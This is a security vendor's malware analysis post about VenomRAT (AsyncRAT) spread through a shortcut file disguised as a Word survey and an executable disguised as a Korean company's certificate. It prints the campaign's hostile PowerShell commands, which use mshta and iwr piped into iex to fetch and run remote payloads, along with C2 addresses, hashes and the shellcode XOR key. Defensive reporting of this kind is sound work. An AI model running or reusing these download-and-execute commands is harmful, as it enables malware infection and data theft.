AhnLab SEcurity intelligence Center (ASEC) found a shortcut file (.lnk) that downloads AsyncRAT (VenomRAT). In order for the LNK file to disguise itself as a normal Word file, it was distributed with the name ‘Survey.docx.lnk’ inside a compressed file which also contained a normal text file. Above all, users need to remain vigilant, as the executable file (blues.exe) used in the attack is disguised as a Korean company’s certificate.
The overall operation process of the malware is as shown below.
Figure 1. Operation processThe compressed file is disguised as a ‘survey’ to encourage users to open it. Inside the compressed file is a text file and the malicious LNK file. The text file contains instructions that guide users to execute the malicious LNK file.
Figure 2. Inside the readme.txt fileThe LNK file has malicious commands included and when it is executed, it runs additional script codes by connecting to an external URL through mshta.
Figure 3. LNK properties- Execution command
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe . $env:C:\W*\S*2\m*h?a.* ‘hxxp://194.33.191[.]248:7287/docx1.hta’
hxxp://194.33.191[.]248:7287/docx1.hta has obfuscated strings inside. When they are decoded, a PowerShell command can be seen. This command downloads additional files and saves them in the %appdata% folder before executing them.
- Download URL
hxxp://194.33.191[.]248:7287/qfqe.docx
hxxp://194.33.191[.]248:7287/blues.exe
Figure 4. Part of the script code inside docx1.hta
Figure 5. Part of the decoded docx1.hta codeThe downloaded qfqe.docx file is a normal Word document that contains survey information, which makes it hard for the user to notice any malicious activities.
Figure 6. Inside qfqe.docxThe blues.exe file that is downloaded with the Word file is a downloader-type malware disguised as a Korean IT company’s certificate. When executed, it downloads additional scripts through PowerShell.
Figure 7. Signature information of blues.exe
Figure 8. Part of the blues.exe code- Execution command
powershell iwr hxxp://194.33.191[.]248:7287/sys.ps1 -UseBasicParsing | iex
The sys.ps1 executed through the blues.exe file shown above is also a downloader-type malware that downloads additional data from hxxp://194.33.191[.]248:7287/adb.dll and executes it in a fileless format.
Figure 9. sys.ps1 codeadb.dll has an encoded shellcode inside, and this is decrypted by calculating the XOR of Base64 and the ‘sorootktools’ string.
Figure 10. Encoded shellcode included in the adb.dllThe ultimately executed shellcode performs keylogging and leaks user PC information with the RAT-type malware VenomRAT (AsyncRAT). It can also perform various malicious behaviors by receiving commands from the threat actor.
- C2 : 194.33.191[.]248:4449
Figure 11. Part of the VenomRAT (AsyncRAT) codeMalicious shortcut files disguised as normal documents are continuously being distributed. Users can mistake the shortcut file for a normal document, as the ‘.lnk’ extension is not visible on the names of the files. Therefore, particular caution is advised.
[File Detection]
Trojan/LNK.Runner (2024.01.16.00)
Trojan/HTML.Agent.SC196238 (2024.01.17.00)
Trojan/Win.Generic.C5572807 (2024.01.12.03)
Trojan/PowerShell.Agent (2024.01.17.00)
Trojan/Win.Generic.C5337844 (2022.12.21.00)
[Behavior Detection]
Execution/MDP.Powershell.M2514
[IOC Info]
MD5
2dfaa1dbd05492eb4e9d0561bd29813b
f57918785e7cd4f430555e6efb00ff0f
e494fc161f1189138d1ab2a706b39303
2d09f6e032bf7f5a5d1203c7f8d508e4
335b8d0ffa6dffa06bce23b5ad0cf9d6
C&C
hxxp://194.33.191[.]248:7287/docx1.hta
hxxp://194.33.191[.]248:7287/qfqe.docx
hxxp://194.33.191[.]248:7287/blues.exe
hxxp://194.33.191[.]248:7287/sys.ps1
hxxp://194.33.191[.]248:7287/adb.dll
194.33.191[.]248:4449
Subscribe to AhnLab’s next-generation threat intelligence platform ‘AhnLab TIP’ to check related IOC and detailed analysis information.
The post Distribution of VenomRAT (AsyncRAT) Impersonating Korean IT Companies appeared first on ASEC BLOG.
Article Link: Distribution of VenomRAT (AsyncRAT) Impersonating Korean IT Companies - ASEC BLOG